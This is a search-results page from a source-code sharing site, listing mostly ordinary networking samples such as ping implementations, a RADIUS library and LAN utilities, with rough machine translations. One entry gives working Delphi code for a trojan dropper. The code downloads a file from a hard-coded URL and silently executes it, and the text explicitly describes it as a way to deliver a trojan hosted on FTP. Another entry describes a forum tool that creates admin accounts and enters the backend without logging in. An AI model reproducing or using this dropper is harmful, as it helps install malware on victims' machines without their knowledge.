Hot Search : Source embeded web remote control p2p game More...
Location : Home Search - c l
Search - c l - List
用C++编写的一些局域网网络通信编程实例: 获取网上邻居【\\Neighbor】 lIP地址和计算机名之间的转换【\\Neighbor】 l映射网络驱动器【\\Neighbor】 l消息发送程序Net Send【\\Neighbor】 l获取局域网内其他计算机的信息【\\ NeighborInfo】
Date : 2008-10-13 Size : 81.34kb User : 李菲

N D I S协议驱动程序源代码用C语言完成,包括四个C语言源文件,分别为p a c k e t . c、o p e n c l o s . c、 r e a d . c和w r i t e . c。C语言头文件p a c k e t . h和资源文件p a c k e t . r c通过D D K提供的b u i l d工具编译生成驱动 程序可执行文件p a c k e t . s y s。-S I N D agreements driver source code using C language completed, including four C language source documents for a p c k e t. C, n o p c l e s o. C, a r e d. W r c and i t e. c. C-language header file a p c k e t. H and a resource document p c k e t. R c through D D K for the b u l d i compiler generation tools driver executable file a p c k e t. S y s.
Date : 2025-12-27 Size : 63kb User : 张敏

该程序在 Windows 2000 Pro+SP4 下编译调试通过(Visual C++ 6.0 IDE环境)。 需要Winsock2支持。 1.该程序采用了winsock的原始套接字编程,实现了基本的Ping功能,使用方法:ping host,默认连续发送4个回显请求。 2.该程序中对ICMP首部的定义采用了非标准形式。即将选项数据中保存时间戳的头4个字节也定义为ICMP首部的一部分,这样ICMP首部就被定义为12个字节。这样主要做主要是为了编程的实现与理解上的方便。 3.根据习惯ICMP首部的标示符字段填充了进程ID。 4.该程序实现了在IP首部记录路由的RR功能,最多记录9个地址。 要实现的功能参数: 1.n 参数 设定发送回显请求的数量 2.l 参数 设定选项数据的填充字节数 3.t 参数 持续的发送回显请求,直到用户按下Control-C停止 4 w 参数 设定接收超时的时间,以毫秒为单位 参数的具体说明可以参考windows自带的ping程序-the program in Windows 2000 SP4 Pro compiler under through debugging (Visual C 6.0 IDE environment). Winsock2 need support. 1. The procedure adopted protocols of the original socket programming, the basic implementation of Ping function, Use : ping host, the default four consecutive send the request back significantly. 2. The procedure for the first ICMP using the definition of non-standard forms. Upcoming options to preserve the timestamp data for the first four bytes are defined as ICMP first part, the first such ICMP was defined as 12 bytes. This is done primarily to the realization of programming and understanding for it. 3. Under customary ICMP first marker Address field filled with the process ID. 4. The program achieved in the first record of IP routing RR functions, the most record
Date : 2025-12-27 Size : 14kb User : 赵锐

执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadFile(SourceFile, DestFile: string): Boolean begin GetMem(u,100) GetMem(l,100) u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址 l:= c:/downpage.txt //改为你要存放并打开文件的路径 try Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0 except Result := False end end begin if DownloadFile(u, l) then begin ShellExecute(0, PChar( open ), PChar(l), PChar( ), nil, 0) end //freemem(u) //freemem(l) end. 先试一下。。。。 ok, 明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R*. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http :// www.jm-my.com/ip2.txt// read you want to download the website l : = c :/downpage.txt// read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
Date : 2025-12-27 Size : 1kb User : 韩冰

采用ace开发的 radius 应用ACE RADIUS library is a free portable implementation of RADIUS protocol, as defined in RFCs 2865 and 2866. It s written in C++ on top of ACE (Adaptive Communication Environment) and supports wide variety of platforms, including Windows, Solaris, Linux, VxWorks etc. -used ace development of the application of the ACE radius RADIUS library is a f ree portable implementation of RADIUS protoco l as defined in RFCs 2865 and 2866. It's written in C on top of the ACE (Adaptive Communication Environm ent) and supports wide variety of platforms, including Windows, Solaris, Linux, VxWorks etc..
Date : 2025-12-27 Size : 55kb User : jack

动网论坛KEY清除工具 功能简介: A 在删除了所有管理员情况下,新建admin帐号。 B 修改某一用户密码并提升为管理员。 C 当论坛关闭时没有开启之匙。 D 子论坛统计子数错误之修复。 E 修复固顶帖,修复主题表情,修复分版Board_user字段,修复用户表UserTopic字段及自定义权限错误。 F 清空本论坛所在服务器的缓存信息。 G 修复用户主题值、注册日期为空,星座显示undefined的错误。 H 修正删除不活动用户时间值过大的错误。 I 查看动网论坛常规信息与常用上传组件及图片处理组件探针。 J 修复帖子解固后无法被固顶或区固顶的错误。 K 修复管理员没有进入后台权限。 L 不没有登录的状态下直接进入后台操作-err
Date : 2025-12-27 Size : 13kb User : lmt

用C++编写的一些局域网网络通信编程实例: 获取网上邻居【\Neighbor】 lIP地址和计算机名之间的转换【\Neighbor】 l映射网络驱动器【\Neighbor】 l消息发送程序Net Send【\Neighbor】 l获取局域网内其他计算机的信息【\ NeighborInfo】-With C++ Prepared a number of local area network communication programming examples: Access Network Places Neighbor] [LIP address and computer name conversion between Neighbor] [l mapped network drive Neighbor] [l procedures Net Send message Neighbor] [l LAN access to other computer information] [NeighborInfo
Date : 2025-12-27 Size : 81kb User : 李菲

本书提供了成为一名 C i s c o认证网络从业人员( C C N A )所需的信息。 一个潜在的 C C N A必须具有安装、配置和操作简单路由 L A N、路由WA N和交换L A N以及L A N E网络的知识。 这是学习知识冒险经历的开始。本书可以作为参考和学习工具,它们可以使一个工程师 达到互连网专家的高度。-This book provides a C isco to become a certified network professionals (CCNA) required information. CCNA a potential must have to install, configure and operate simple routed LAN, routing WA N and the exchange of LAN and LANE networks of knowledge. This is a learning adventure start. This book can serve as a reference and learning tool, which allows an engineer to achieve a high degree of Internet experts.
Date : 2025-12-27 Size : 11.36mb User : 张威

为 了提高用户身份认证和授权管理的灵活性,从We b 应用系统的安全性角度出发,讨论了 一 种在. N E T F r a me w o r k下保证应用程序安全性的身份验证和授权模型,并给出了模型的具体实现方法。 该模型利用 F o r ms身份验证方法对用户的身份进行鉴别。在授权处理上,模型结合统一资源定位( u . J f o r m R e s o u r c e L o c a t o r , U R L ) 授权模式和用户所具有的系统角色,分别从页面级和页面操作级对用户的访问进行 控制。该模型在企业局域网环境内能够提供比较灵活的身份认证和基于角色的授权服务。实际应用表明, 基于该模型的We b应用系统能够对用户的访问进行有效的控制,从而保证了系统的安全性-In order to enhance user authentication and authorization management flexibility, from the We b application system security point of view, discussed 1 Species. NETF ra me work to ensure application security identity authentication and authorization model, and give a model of the specific methods of implementation. The model F or ms using authentication methods on the user s identity were identified. At authorized treatment, the model combination of Uniform Resource Locator (u. J form R esource L ocator, URL) authorization model and the user has the role of the system, separately from the page-level and page-level operations on the user s visit Control. The model in the enterprise LAN environment can provide a more flexible role-based identity authentication and authorization services. Practical application shows that Based on the model We b applications can access the user s effective control, thereby ensuring the system security
Date : 2025-12-27 Size : 245kb User : 楚知

模拟ping程序,实现 –l, -n, -w, -t等参数,在windows Visual C++ 下调试通过。-Analog ping procedures, implementation-l,-n,-w,-t and other parameters, in the windows Visual C++ under the debugger through.
Date : 2025-12-27 Size : 572kb User : 智慧

给出的pinger程序,并加上 –l, -n, -w, -t等参数,在windows Visual C++ 下调试通过。-Pinger given procedure, and add-l,-n,-w,-t and other parameters, in the windows Visual C++ under the debugger through.
Date : 2025-12-27 Size : 5kb User : 王维

c est un document qui decrit l utilité de linux xenomai
Date : 2025-12-27 Size : 218kb User : bouthouri

c est un document qui decrit l utilité de RTlinux
Date : 2025-12-27 Size : 218kb User : bouthouri

c est un document qui decrit l utilité de linux xenomai
Date : 2025-12-27 Size : 224kb User : bouthouri

c est un document qui decrit l utilité de linux xenomai
Date : 2025-12-27 Size : 553kb User : bouthouri

在pinger程序,并加上 –l, -n, -w, -t等参数,在windows Visual C++ 下调试通过。给出屏幕显示结果-In the pinger program, and add-l,-n,-w,-t parameters, the windows Visual C++ to debug through. The results are given screen
Date : 2025-12-27 Size : 580kb User : 胡改蝶

lan program compling options gcc -o server server.c -l socket
Date : 2025-12-27 Size : 3kb User : maddy

Simple program to call 2 threads in C for linux to compile : gcc hilo.c -l pthread -o thread -Wa-Simple program to call 2 threads in C for linux to compile : gcc hilo.c -l pthread -o thread -Wall
Date : 2025-12-27 Size : 1kb User : loginkier

pipe code with c++,1 pipe with 2 procce-pipe code with c++,1 pipe with 2 proccess
Date : 2025-12-27 Size : 1kb User : masuume

自己随手看着课本写的c++练习,可能不调好,仅仅是练习而已(You look at the c++ practice written in the textbook. It may not be well adjusted. It's just a practice.)
Date : 2025-12-27 Size : 2.88mb User : 邵丶都
« 12 »
CodeBus is one of the largest source code repositories on the Internet!
Contact us :
1999-2046 CodeBus All Rights Reserved.